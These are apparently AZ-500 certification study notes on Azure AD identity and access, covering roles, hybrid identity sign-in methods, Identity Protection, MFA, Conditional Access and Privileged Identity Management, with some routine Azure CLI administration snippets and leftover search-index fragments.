Windows Update Deployment Administrator: Users in this role can create and manage all aspects of Windows Update deployments through the Windows Update for Business deployment service. The deployment service enables users to define settings for when and how updates are deployed, and to specify which updates are offered to groups of devices in their tenant. It also allows users to monitor update progress.

Yammer Administrator: Assign the Yammer Administrator role to users who need to do the following tasks:

• Manage all aspects of Yammer
• Create, manage, and restore Microsoft 365 Groups, but not role-assignable groups
• View the hidden members of Security groups and Microsoft 365 groups, including role-assignable groups
• Read usage reports in the Microsoft 365 admin center
• Create and manage service requests in the Microsoft 365 admin center
• View announcements in the Message center, but not security announcements
• View service health

1.5. Deploy Azure Active Directory Domain Services

                            Azure Active Directory Domain Services (Azure AD DS) provides managed domain services such as domain join, group policy, lightweight directory access protocol (LDAP), and Kerberos/New Technology LAN Manager (NTLM) authentication. You use these domain services without the need to deploy, manage, and patch domain controllers (DCs) in the cloud.

                            Azure AD DS integrates with your existing Azure AD tenant. This integration lets users sign in to services and applications connected to the managed domain using their existing credentials.

When you create an Azure AD DS managed domain, you define a unique namespace. This namespace is the domain name, such as aaddscontoso.com. Two Windows Server domain controllers (DCs) are then deployed into your selected Azure region. This deployment of DCs is known as a replica set. You can expand a managed domain to have more than one replica set per Azure AD tenant. Replica sets can be added to any peered virtual network in any Azure region that supports Azure AD DS. You don't need to manage, configure, or update these DCs. The Azure platform handles the DCs as part of the managed domain, including backups and encryption at rest using Azure Disk Encryption.

Azure AD DS replicates identity information from Azure AD, so it works with Azure AD tenants that are cloud-only or synchronized with an on-premises AD DS environment. Azure AD DS performs a one-way synchronization from Azure AD to provide access to a central set of users, groups, and credentials. You can create resources directly in the managed domain (Azure AD DS), but they aren't synchronized back to Azure AD.
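A quick way to see whether a managed domain already exists in a subscription is to query its ARM resource type. A minimal sketch with the Azure CLI (assuming you're logged in to the right subscription; the resource type is the only non-placeholder here):

```bash
# List Azure AD DS managed domains in the current subscription.
# Azure AD DS is deployed as an ARM resource of type Microsoft.AAD/domainServices.
az resource list \
  --resource-type "Microsoft.AAD/domainServices" \
  --query "[].{name:name, location:location}" -o table
```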

                            Concepts:

Azure Active Directory (Azure AD) - Cloud-based identity and mobile device management that provides user account and authentication services for resources such as Microsoft 365, the Azure portal, or SaaS applications.

                            Azure AD can be synchronized with an on-premises AD DS environment to provide a single identity to users that works natively in the cloud.

Active Directory Domain Services (AD DS) - Enterprise-ready lightweight directory access protocol (LDAP) server that provides key features such as identity and authentication, computer object management, group policy, and trusts.

                            AD DS is a central component in many organizations with an on-premises IT environment and provides core user account authentication and computer management features.

Azure Active Directory Domain Services (Azure AD DS) - Provides managed domain services with a subset of fully compatible traditional AD DS features such as domain join, group policy, LDAP, and Kerberos/New Technology LAN Manager (NTLM) authentication.

                            Azure AD DS integrates with Azure AD, which can synchronize with an on-premises AD DS environment. This ability extends central identity use cases to traditional web applications that run in Azure as part of a lift-and-shift strategy.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#16-create-and-manage-azure-ad-users","title":"1.6. Create and manage Azure AD users","text":"

                            Note for deleted users:

The user is deleted and no longer appears on the Users - All users page. The user can be seen on the Deleted users page for the next 30 days and can be restored during that time. When a user is deleted, any licenses consumed by the user are made available for other users.

                            To update the identity, contact information, or job information for users whose source of authority is Windows Server Active Directory, you must use Windows Server Active Directory. After you complete the update, you must wait for the next synchronization cycle to complete before you see the changes.
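As an illustration of this lifecycle, here is a minimal Azure CLI sketch; the display name, UPN, password, and object id are hypothetical placeholders, and the signed-in identity is assumed to hold a user management role such as User Administrator:

```bash
# Create a cloud-only user (UPN, name, and password are placeholders).
az ad user create \
  --display-name "Jane Doe" \
  --user-principal-name jane.doe@contoso.onmicrosoft.com \
  --password 'P@ssw0rd-Change-Me!'

# Soft-delete the user; it remains restorable for 30 days.
az ad user delete --id jane.doe@contoso.onmicrosoft.com

# List soft-deleted users, then restore one by object id (Microsoft Graph).
az rest --method GET \
  --url "https://graph.microsoft.com/v1.0/directory/deletedItems/microsoft.graph.user"
az rest --method POST \
  --url "https://graph.microsoft.com/v1.0/directory/deletedItems/<object-id>/restore"
```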

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#17-manage-users-with-azure-ad-groups","title":"1.7. Manage users with Azure AD groups","text":"

                            Azure AD lets you use groups to manage access to applications, data, and resources. Resources can be:

                            • Part of the Azure AD organization, such as permissions to manage objects through roles in Azure AD
                            • External to the organization, such as for Software as a Service (SaaS) apps
                            • Azure services
                            • SharePoint sites
                            • On-premises resources

There are two group types and three group membership types.

Group types:

• Security: Used to manage user and computer access to shared resources.
• Microsoft 365: Provides collaboration opportunities by giving group members access to a shared mailbox, calendar, files, SharePoint sites, and more.
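For example, creating a security group and adding a member might look like this with the Azure CLI (the group name and the member object id are hypothetical placeholders):

```bash
# Create a security group; the mail nickname is required even for
# non-mail-enabled security groups.
az ad group create \
  --display-name "sec-shared-storage" \
  --mail-nickname "sec-shared-storage"

# Add a user (or service principal) to it by object id.
az ad group member add \
  --group "sec-shared-storage" \
  --member-id <user-object-id>
```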

                            Membership types:

                            • Assigned: Lets you add specific users as members of a group and have unique permissions.
• Dynamic user: Lets you use dynamic membership rules to automatically add and remove members. If a member's attributes change, the system looks at your dynamic group rules for the directory to see if the member meets the rule requirements (is added) or no longer meets the rule requirements (is removed).
• Dynamic device: Lets you use dynamic group rules to automatically add and remove devices. If a device's attributes change, the system looks at your dynamic group rules for the directory to see if the device meets the rule requirements (is added) or no longer meets the rule requirements (is removed).

You can create a dynamic group for either devices or users, but not for both. You can't create a device group based on the device owners' attributes. Device membership rules can only reference device attributes.
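A minimal sketch of creating a dynamic user group through Microsoft Graph (the group name and the department-based rule are hypothetical examples; dynamic membership also requires an Azure AD Premium P1 license):

```bash
# Create a security group whose membership is driven by a dynamic rule:
# users whose department attribute equals "Sales" are added automatically.
az rest --method POST \
  --url "https://graph.microsoft.com/v1.0/groups" \
  --body '{
    "displayName": "dyn-sales-users",
    "mailEnabled": false,
    "mailNickname": "dyn-sales-users",
    "securityEnabled": true,
    "groupTypes": ["DynamicMembership"],
    "membershipRule": "(user.department -eq \"Sales\")",
    "membershipRuleProcessingState": "On"
  }'
```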

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#18-configure-azure-ad-administrative-units","title":"1.8. Configure Azure AD administrative units","text":"

                            An administrative unit can contain only users and groups. Administrative units restrict permissions in a role to any portion of your organization that you define. You could, for example, use administrative units to delegate the Helpdesk Administrator role to regional support specialists.

                            To use administrative units, you need an Azure Active Directory Premium license for each administrative unit admin, and Azure Active Directory Free licenses for administrative unit members.
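Creating an administrative unit and scoping a user into it can be done through Microsoft Graph; a minimal sketch (the unit name is hypothetical, `<au-id>` comes from the creation response, and the caller is assumed to have a role such as Privileged Role Administrator):

```bash
# Create an administrative unit.
az rest --method POST \
  --url "https://graph.microsoft.com/v1.0/directory/administrativeUnits" \
  --body '{"displayName": "EMEA-Helpdesk"}'

# Add a user to it by object id (note the $ref segment).
az rest --method POST \
  --url "https://graph.microsoft.com/v1.0/directory/administrativeUnits/<au-id>/members/\$ref" \
  --body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/<user-object-id>"}'
```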

                            Available roles for Azure AD administrative units

Authentication Administrator: Has access to view, set, and reset authentication method information for any non-admin user in the assigned administrative unit only.

Groups Administrator: Can manage all aspects of groups and group settings, such as naming and expiration policies, in the assigned administrative unit only.

Helpdesk Administrator: Can reset passwords for non-administrators and Helpdesk Administrators in the assigned administrative unit only.

License Administrator: Can assign, remove, and update license assignments within the administrative unit only.

Password Administrator: Can reset passwords for non-administrators and Password Administrators within the assigned administrative unit only.

User Administrator: Can manage all aspects of users and groups, including resetting passwords for limited admins, within the assigned administrative unit only.

1.9. Passwordless authentication

Microsoft global Azure and Azure Government offer the following three passwordless authentication options that integrate with Azure Active Directory (Azure AD):

                            1. Windows Hello for Business: Windows Hello for Business is ideal for information workers that have their own designated Windows PC. The biometric and PIN credentials are directly tied to the user's PC, which prevents access from anyone other than the owner. With public key infrastructure (PKI) integration and built-in support for single sign-on (SSO), Windows Hello for Business provides a convenient method for seamlessly accessing corporate resources on-premises and in the cloud.
                            2. Microsoft Authenticator: You can also allow your employee's phone to become a passwordless authentication method. You may already be using the Authenticator app as a convenient multi-factor authentication option in addition to a password. You can also use the Authenticator App as a passwordless option.
3. Fast Identity Online 2 (FIDO2) security keys: The FIDO (Fast IDentity Online) Alliance helps to promote open authentication standards and reduce the use of passwords as a form of authentication. FIDO2 is the latest standard that incorporates the web authentication (WebAuthn) standard. Users can register and then select a FIDO2 security key at the sign-in interface as their main means of authentication. These FIDO2 security keys are typically USB devices but could also use Bluetooth or Near-Field Communication (NFC). A sketch of enabling this method tenant-wide follows this list.
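Before users can register FIDO2 keys, the method has to be enabled in the tenant's authentication methods policy. A minimal sketch via Microsoft Graph (assuming the caller holds a role such as Authentication Policy Administrator; per-group targeting is omitted here):

```bash
# Enable the FIDO2 security key method in the authentication methods policy.
az rest --method PATCH \
  --url "https://graph.microsoft.com/v1.0/policies/authenticationMethodsPolicy/authenticationMethodConfigurations/fido2" \
  --body '{
    "@odata.type": "#microsoft.graph.fido2AuthenticationMethodConfiguration",
    "state": "enabled"
  }'
```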
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#2-implement-hybrid-identity","title":"2. Implement Hybrid Identity","text":"

                            Hybrid Identity is the process of connecting your on-premises Active Directory with your Azure Active Directory.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#21-deploy-azure-ad-connect","title":"2.1. Deploy Azure AD connect","text":"

                            Azure AD Connect will integrate your on-premises directories with Azure Active Directory.

                            Azure AD Connect provides the following features:

• Password hash synchronization. A sign-in method that synchronizes a hash of a user's on-premises AD password with Azure AD.
                            • Pass-through authentication. A sign-in method that allows users to use the same password on-premises and in the cloud, but doesn't require the additional infrastructure of a federated environment.
                            • Federation integration. Federation is an optional part of Azure AD Connect and can be used to configure a hybrid environment using an on-premises AD FS infrastructure. It also provides AD FS management capabilities such as certificate renewal and additional AD FS server deployments.
• Synchronization. Responsible for creating users, groups, and other objects, and for making sure identity information for your on-premises users and groups matches the cloud. This synchronization also includes password hashes.
                            • Health Monitoring. Azure AD Connect Health can provide robust monitoring and provide a central location in the Azure portal to view this activity.

Azure Active Directory (Azure AD) Connect Health provides robust monitoring of your on-premises identity infrastructure. It enables you to maintain a reliable connection to Microsoft 365 and Microsoft Online Services. With Azure AD Connect Health, the key data you need is easily accessible. You can view and act on alerts, set up email notifications for critical alerts, and view performance data. Azure AD Connect Health works by installing an agent on each of your on-premises sync servers.
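From the cloud side, you can verify that directory synchronization is actually running by reading the organization object; a minimal sketch (a read-only directory role is sufficient):

```bash
# Check whether sync is enabled and when the last sync cycle completed.
az rest --method GET \
  --url 'https://graph.microsoft.com/v1.0/organization?$select=onPremisesSyncEnabled,onPremisesLastSyncDateTime'
```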

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#23-introduction-to-authentication","title":"2.3 Introduction to Authentication","text":"

Identity is the new control plane of IT security. When the Azure AD hybrid identity solution is your new control plane, authentication is the foundation of cloud access. All the other advanced security and user experience features in Azure AD depend on your authentication method.

                            Azure AD supports the following authentication methods for hybrid identity solutions:

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#cloud-authentication","title":"Cloud authentication","text":"

Azure AD handles users' sign-in process. Coupled with seamless single sign-on (SSO), users can sign in to cloud apps without having to reenter their credentials.

Option 1: Azure AD password hash synchronization. The simplest way to enable authentication for on-premises directory objects in Azure AD.

Option 2: Azure AD Pass-through Authentication. Provides a simple password validation for Azure AD authentication services by using a software agent that runs on one or more on-premises servers. The servers validate the users directly with your on-premises Active Directory, which ensures that the password validation doesn't happen in the cloud. Companies with a security requirement to immediately enforce on-premises user account states, password policies, and sign-in hours might use this authentication method.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#federal-authentication","title":"Federal authentication","text":"

Azure AD hands off the authentication process to a separate trusted authentication system, such as on-premises Active Directory Federation Services (AD FS), to validate the user's password. The authentication system can provide additional advanced authentication requirements. Examples are smartcard-based authentication or third-party multifactor authentication.

So, which one is more appropriate for your organization? See the decision tree in the Microsoft documentation.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#24-azure-ad-password-hash-synchronization-phs","title":"2.4. Azure AD Password Hash Synchronization (PHS)","text":"

Password hash synchronization (PHS) is a feature used to synchronize user passwords from an on-premises Active Directory instance to a cloud-based Azure AD instance. Use this feature to sign in to Azure AD services like Microsoft 365, Microsoft Intune, CRM Online, and Azure Active Directory Domain Services (Azure AD DS). You sign in to the service by using the same password you use to sign in to your on-premises Active Directory instance.

How does synchronization work? In the background, the password synchronization component takes the user's password hash from on-premises Active Directory, encrypts it, and passes it as a string to Azure. Azure decrypts the encrypted hash and stores the password hash as a user attribute in Azure AD. When the user signs in to an Azure service, the sign-in challenge dialog box generates a hash of the user's password and passes that hash back to Azure. Azure then compares the hash with the one in that user's account. If the two hashes match, then the two passwords must also match, and the user receives access to the resource. The dialog box provides the facility to save the credentials so that the next time the user accesses the Azure resource, the user will not be prompted.

It is important to understand that this is same sign-in, not single sign-on. The user still authenticates against two separate directory services, albeit with the same user name and password. This solution provides a simple alternative to an AD FS implementation.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#25-azure-ad-pass-through-authentication-pta","title":"2.5. Azure AD Pass-through Authentication (PTA)","text":"

Azure AD Pass-through Authentication (PTA) allows users to sign in to both on-premises and cloud-based applications using the same user accounts and passwords. When users sign in using Azure AD, pass-through authentication validates the users' passwords directly against an organization's on-premises Active Directory. Benefits:

                            • Supports user sign-in into all web browser-based applications and into Microsoft Office client applications that use modern authentication.
                            • Sign-in usernames can be either the on-premises default username (userPrincipalName) or another attribute configured in Azure AD Connect (known as Alternate ID).
                            • Works seamlessly with conditional access features such as Azure Active Directory Multi-Factor Authentication to help secure your users.
                            • Integrated with cloud-based self-service password management, including password writeback to on-premises Active Directory and password protection by banning commonly used passwords.
                            • Multi-forest environments are supported if there are forest trusts between your AD forests and if name suffix routing is correctly configured.
                            • PTA is a free feature, and you don't need any paid editions of Azure AD to use it.
                            • PTA can be enabled via Azure AD Connect.
                            • PTA uses a lightweight on-premises agent that listens for and responds to password validation requests.
                            • Installing multiple agents provides high availability of sign-in requests.
                            • PTA protects your on-premises accounts against brute force password attacks in the cloud.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#26-azure-ad-federation","title":"2.6. Azure AD Federation","text":"

                            Federation is a collection of domains that have established trust. The level of trust may vary, but typically includes authentication and almost always includes authorization. A typical federation might include a number of organizations that have established trust for shared access to a set of resources. You can federate your on-premises environment with Azure AD and use this federation for authentication and authorization. This sign-in method ensures that all user authentication occurs on-premises. This method allows administrators to implement more rigorous levels of access control.

                            If you decide to use Federation with Active Directory Federation Services (AD FS), you can optionally set up password hash synchronization as a backup in case your AD FS infrastructure fails.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#27-configure-password-writeback","title":"2.7. Configure password writeback","text":"

Password writeback is a feature enabled with Azure AD Connect that allows password changes in the cloud to be written back to an existing on-premises directory in real time.

To use self-service password reset (SSPR) you must have already configured Azure AD Connect in your environment.

                            Password writeback provides:

                            • Enforcement of on-premises Active Directory Domain Services password policies. When a user resets their password, it is checked to ensure it meets your on-premises Active Directory Domain Services policy before committing it to that directory. This review includes checking the history, complexity, age, password filters, and any other password restrictions that you have defined in local Active Directory Domain Services.
                            • Zero-delay feedback. Password writeback is a synchronous operation. Your users are notified immediately if their password did not meet the policy or could not be reset or changed for any reason.
                            • Supports password changes from the access panel and Microsoft 365. When federated or password hash synchronized users come to change their expired or non-expired passwords, those passwords are written back to your local Active Directory Domain Services environment.
• Supports password writeback when an admin resets them from the Azure portal. Whenever an admin resets a user's password in the Azure portal, if that user is federated or password hash synchronized, the password is written back to on-premises. This functionality is currently not supported in the Office admin portal.
• Doesn't require any inbound firewall rules. Password writeback uses an Azure Service Bus relay as an underlying communication channel. All communication is outbound over port 443.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#3-microsoft-entra-id-protection-identity-protection","title":"3. Microsoft Entra ID Protection (Identity Protection)","text":"

Risk detections in Azure AD Identity Protection include any identified suspicious actions related to user accounts in the directory. The signals generated by Identity Protection can be fed into tools like Conditional Access to make access decisions, or sent to a security information and event management (SIEM) tool for further investigation based on your organization's enforced policies.

To protect your organization, you can use the following:

                            • Azure AD Identity Protection policies can automatically block a sign-in attempt or require additional action, such as requiring a password change or prompt for Azure AD Multi-Factor Authentication.
                            • These policies work with existing Azure AD Conditional Access policies as an extra layer of protection for your organization.

                            Some of the following actions may trigger Azure AD Identity Protection risk detection:

                            • Users with leaked credentials.
                            • Sign-ins from anonymous IP addresses.
                            • Impossible travel to atypical locations.
                            • Sign-ins from infected devices.
                            • Sign-ins from IP addresses with suspicious activity.

The insight you get for a detected risk detection is tied to your Azure AD subscription.

Azure Active Directory Identity Protection includes three default policies that administrators can choose to enable:

• MFA registration policy - Identity Protection can help organizations roll out Azure Multi-Factor Authentication using a Conditional Access policy requiring registration at sign-in. Makes sure users are registered for Azure AD Multi-Factor Authentication. If a sign-in risk policy prompts for MFA, the user must already be registered for Azure AD Multi-Factor Authentication.
• Sign-in risk policy - Identity Protection analyzes signals from each sign-in, both real-time and offline, and calculates a risk score based on the probability that the sign-in wasn't performed by the user. Administrators can decide based on this risk score signal to enforce organizational requirements. Administrators can choose to block access, allow access, or allow access but require multi-factor authentication. Administrators can also choose to create a custom Conditional Access policy, including sign-in risk as an assignment condition.
• User risk policy - Identifies and responds to user accounts that may have compromised credentials. Can prompt the user to create a new password.

When you enable a user risk or sign-in risk policy, you can also choose the threshold for risk level - low and above, medium and above, or high. This flexibility lets you decide how aggressive you want to be in enforcing any controls for suspicious sign-in events.
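These detections can also be consumed programmatically, for example to forward them to a SIEM. A minimal sketch querying Microsoft Graph (assuming an Azure AD Premium P2 license and a role such as Security Reader):

```bash
# Pull the most recent risk detections from Identity Protection.
az rest --method GET \
  --url 'https://graph.microsoft.com/v1.0/identityProtection/riskDetections?$top=50'
```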

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#31-implement-user-risk-policy","title":"3.1. Implement user risk policy","text":"

                            Identity Protection can calculate what it believes is normal for a user's behavior and use that to base decisions for their risk. User risk is a calculation of probability that an identity has been compromised. Administrators can decide based on this risk score signal to enforce organizational requirements. Administrators can choose to block access, allow access, or allow access but require a password change using Azure AD self-service password reset.

The risky users report includes this data:

                            • Which users are at risk, have had risk remediated, or have had risk dismissed?
                            • Details about detections
                            • History of all risky sign-ins
                            • Risk history

Administrators can then act on these events (see the sketch after this list). They can choose to:

                            • Reset the user password
                            • Confirm user compromise
                            • Dismiss user risk
                            • Block user from signing in
                            • Investigate further using Azure ATP
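Some of these actions are available through Microsoft Graph as well; a minimal sketch (the user object id is a hypothetical placeholder, and the caller is assumed to hold a role such as Security Operator plus an Azure AD Premium P2 license):

```bash
# List users currently flagged as high risk.
az rest --method GET \
  --url "https://graph.microsoft.com/v1.0/identityProtection/riskyUsers?\$filter=riskLevel eq 'high'"

# Confirm a user as compromised (raises their risk to high) ...
az rest --method POST \
  --url "https://graph.microsoft.com/v1.0/identityProtection/riskyUsers/confirmCompromised" \
  --body '{"userIds": ["<user-object-id>"]}'

# ... or dismiss the risk if the investigation finds it benign.
az rest --method POST \
  --url "https://graph.microsoft.com/v1.0/identityProtection/riskyUsers/dismiss" \
  --body '{"userIds": ["<user-object-id>"]}'
```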
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#32-implement-sign-in-risk-policy","title":"3.2. Implement sign-in risk policy","text":"

                            Sign-in risk represents the probability that a given authentication request isn't authorized by the identity owner. For users of Azure Identity Protection, sign-in risk can be evaluated as part of a Conditional Access policy. Sign-in Risk Policy supports the following conditions:

• Location: When configuring location as a condition, organizations can choose to include or exclude locations. These named locations may include the public IPv4 network information, country or region, or even unknown areas that don't map to specific countries or regions.
                            • Client apps: Conditional Access policies by default apply to browser-based applications and applications that utilize modern authentication protocols. In addition to these applications, administrators can choose to include Exchange ActiveSync clients and other clients that utilize legacy protocols.
                            • Risky sign-ins: The risky sign-ins report contains filterable data for up to the past 30 days (1 month). With the information provided by the risky sign-ins report, administrators can find:
                              • Which sign-ins are classified as at risk, confirmed compromised, confirmed safe, dismissed, or remediated.
                              • Real-time and aggregate risk levels associated with sign-in attempts.
                              • Detection types triggered.
  • Conditional Access policies applied.
  • MFA details.
  • Device information.
  • Application information.
  • Location information.

Administrators can then take action on these events. They can choose to:

                            • Confirm sign-in compromise
                            • Confirm sign-in safe
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#33-deploy-multifactor-authentication-in-azure","title":"3.3. Deploy multifactor authentication in Azure","text":"

                            For organizations that need to be compliant with industry standards, such as the Payment Card Industry (PCI) Data Security Standard (DSS) version 3.2, MFA is a must have capability to authenticate users. Beyond being compliant with industry standards, enforcing MFA to authenticate users can also help organizations to mitigate credential theft attacks.

                            Methods

Call to phone: Places an automated voice call. The user answers the call and presses # on the phone keypad to authenticate. The phone number is not synchronized to on-premises Active Directory. A voice call is important because it persists through a phone handset upgrade, allowing the user to register the mobile app on the new device.

Text message to phone: Sends a text message that contains a verification code. The user is prompted to enter the verification code into the sign-in interface. This process is called one-way SMS. Two-way SMS, where the user must text back a particular code, was deprecated and is not supported after November 14, 2018; users who were configured for two-way SMS were automatically switched to call-to-phone verification at that time.

                            Notification through mobile app: Sends a push notification to your phone or registered device. The user views the notification and selects Approve to complete verification. The Microsoft Authenticator app is available for Windows Phone, Android, and iOS. Push notifications through the mobile app provide the best user experience.

                            Verification code from mobile app: The Microsoft Authenticator app generates a new OATH verification code every 30 seconds. The user enters the verification code into the sign-in interface. The Microsoft Authenticator app is available for Windows Phone, Android, and iOS. Verification code from mobile app can be used when the phone has no data connection or cellular signal.

                            Settings

• Account lockout: The account lockout settings let you specify how many failed attempts to allow before the account becomes locked out for a period of time. The account lockout settings are only applied when a PIN code is entered for the MFA prompt. The following settings are available: number of MFA denials to trigger account lockout, minutes until the account lockout counter is reset, and minutes until the account is automatically unblocked.
                            • Block and unblock users: If a user's device has been lost or stolen, you can block authentication attempts for the associated account.
                            • Fraud alerts: Configure the fraud alert feature so that your users can report fraudulent attempts to access their resources. Code to report fraud during initial greeting: When users receive a phone call to perform two-step verification, they normally press # to confirm their sign-in. To report fraud, the user enters a code before pressing #. This code is 0 by default, but you can customize it.
                            • Notification: Email notifications can be configured when users report fraud alerts.
                            • OATH tokens: Azure AD supports the use of OATH-TOTP SHA-1 tokens that refresh codes every 30 or 60 seconds. Customers can purchase these tokens from the vendor of their choice.
• Trusted IPs: Trusted IPs is a feature that allows federated users or IP address ranges to bypass two-step authentication. There are two selections:
                              • Managed tenants. For managed tenants, you can specify IP ranges that can skip MFA.
                              • Federated tenants. For federated tenants, you can specify IP ranges and you can also exempt AD FS claims users.

                            How to deploy MFA

To enable MFA, go to the User Properties in Azure Active Directory, and then the Multi-Factor Authentication option. From there, you can select the users that you want to enable for MFA. You can also bulk enable groups of users with PowerShell. User states can be Enabled, Enforced, or Disabled.

                            Azure AD Multi-Factor Authentication is included free of charge for global administrator security. Enabling MFA for global administrators provides an added level of security when managing and creating Azure resources like virtual machines, managing storage, or using other Azure services. Secondary authentication includes phone call, text message, and the authenticator app. Remember, you can only enable MFA for organizational accounts stored in Azure Active Directory. These are also called work or school accounts.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#34-azure-ad-conditional-access","title":"3.4. Azure AD Conditional Access","text":"

                            Conditional Access is the tool used by Azure Active Directory to bring signals together, to make decisions, and enforce organizational policies. Conditional Access policies at their simplest are if-then statements, if a user wants to access a resource, then they must complete an action. Conditional Access policies are enforced after the first-factor authentication has been completed. Conditional Access is not intended as an organization's first line of defense for scenarios like denial-of-service (DoS) attacks but can use signals from these events to determine access.

Conditional Access is at the heart of the new identity-driven control plane: Identity as a Service is the new control plane.

Conditional Access comes with six conditions: user/group, cloud application, device state, location (IP range), client application, and sign-in risk.

With access controls, you can either block access altogether or grant access with more requirements (a scripted example follows this list):

                            • Require MFA from Azure AD or an on-premises MFA (combined with AD FS).
                            • Grant access to only trusted devices.
                            • Require a domain-joined device.
                            • Require mobile devices to use Intune app protection policies.
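
A hedged sketch of scripting such a policy through the Microsoft Graph v1.0 Conditional Access endpoint follows; the display name is illustrative, and the policy is created in report-only state so it evaluates sign-ins without enforcing anything.

```bash
# Create a Conditional Access policy requiring MFA for medium-and-above sign-in risk.
az rest --method POST \
  --url "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies" \
  --headers "Content-Type=application/json" \
  --body '{
    "displayName": "Require MFA on risky sign-ins",
    "state": "enabledForReportingButNotEnforced",
    "conditions": {
      "users": { "includeUsers": ["All"] },
      "applications": { "includeApplications": ["All"] },
      "signInRiskLevels": ["medium", "high"]
    },
    "grantControls": { "operator": "OR", "builtInControls": ["mfa"] }
  }'
```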
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#35-azure-active-directory-azure-ad-access-reviews","title":"3.5. Azure Active Directory (Azure AD) access reviews","text":"

Navigate to Azure Active Directory (or Microsoft Entra ID) > Identity Governance. Select Access reviews.

                            Azure Active Directory (Azure AD) access reviews enable organizations to efficiently manage group memberships, access to enterprise applications, and role assignments.

                            Use access reviews in the following cases:

• Too many users in privileged roles: It's a good idea to check how many users have administrative access, how many of them are Global Administrators, and if there are any invited guests or partners that have not been removed after being assigned to do an administrative task. You can recertify the role assignments of users in Azure AD roles such as Global Administrator, or in Azure resource roles such as User Access Administrator, in the Azure AD Privileged Identity Management (PIM) experience.
                            • When automation is infeasible: You can create rules for dynamic membership on security groups or Microsoft 365 Groups, but what if the HR data is not in Azure AD or if users still need access after leaving the group to train their replacement? You can then create a review on that group to ensure those who still need access should have continued access.
• When a group is used for a new purpose: If you have a group that is going to be synced to Azure AD, or if you plan to enable a sales management application for everyone in the Sales team group, it would be useful to ask the group owner to review the group membership prior to the group being used in a different risk context.
• Business critical data access: for certain resources, it might be required to ask people outside of IT to regularly sign off and give a justification for why they need access, for auditing purposes.
                            • To maintain a policy's exception list: In an ideal world, all users would follow the access policies to secure access to your organization's resources. However, sometimes there are business cases that require you to make exceptions. As the IT admin, you can manage this task, avoid oversight of policy exceptions, and provide auditors with proof that these exceptions are reviewed regularly.
                            • Ask group owners to confirm they still need guests in their groups: Employee access might be automated with some on premises IAM, but not invited guests. If a group gives guests access to business sensitive content, then it's the group owner's responsibility to confirm the guests still have a legitimate business need for access.
                            • Have reviews recur periodically: You can set up recurring access reviews of users at set frequencies such as weekly, monthly, quarterly or annually, and the reviewers will be notified at the start of each review. Reviewers can approve or deny access with a friendly interface and with the help of smart recommendations.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#4-microsoft-entra-privileged-identity-management-pim","title":"4. Microsoft Entra Privileged Identity Management (PIM)","text":"

                            Using this feature requires Azure AD Premium P2 licenses. Azure AD Privileged Identity Management (PIM) allows you to manage, control, and monitor access to the most important resources in your organization. You can give just-in-time access and just-enough-access to users to allow them to do their tasks. Privileged Identity Management provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources you care about. Here are some of the key features of Privileged Identity Management:

                            • Provide just-in-time privileged access to Azure AD and Azure resources
                            • Assign time-bound access to resources using start and end dates
                            • Require approval to activate privileged roles
                            • Enforce multi-factor authentication to activate any role
                            • Use justification to understand why users activate
                            • Get notifications when privileged roles are activated
                            • Conduct access reviews to ensure users still need roles
                            • Download audit history for internal or external audit
• Prevent removal of the last active Global Administrator and Privileged Role Administrator role assignments

                            Zero Trust model principles:

• Verify explicitly - Always authenticate and authorize based on all available data points.
• Use least privilege access - Limit user access with Just-In-Time and Just-Enough-Access (JIT/JEA), risk-based adaptive policies, and data protection.
• Assume breach - Minimize blast radius and segment access. Verify end-to-end encryption and use analytics to get visibility, drive threat detection, and improve defenses.

Zero Trust model architecture:

                            The primary components of this process are Intune for device management and device security policy configuration, Azure AD conditional access for device health validation, and Azure AD for user and device inventory. The system works with Intune, pushing device configuration requirements to the managed devices. The device then generates a statement of health, which is stored in Azure AD. When the device user requests access to a resource, the device health state is verified as part of the authentication exchange with Azure AD.

                            How does Privileged Identity Management work?

Once you set up Privileged Identity Management, you'll see Tasks, Manage, and Activity options in the left navigation menu. As an administrator, you'll choose between options such as managing Azure AD roles, managing Azure resource roles, or PIM for Groups. When you choose what you want to manage, you see the appropriate set of options for that selection.

                            Azure AD roles:

• Can manage Azure AD roles: Privileged Role Administrator and Global Administrator roles.
• Can read Azure AD roles: Global Administrator, Security Administrator, Global Reader, and Security Reader roles.

Azure resource roles:

• Can be managed by: Subscription Administrator, Resource Owner, and Resource User Access Administrator roles.
• Cannot even be read by: Privileged Role Administrator, Security Administrator, or Security Reader roles.

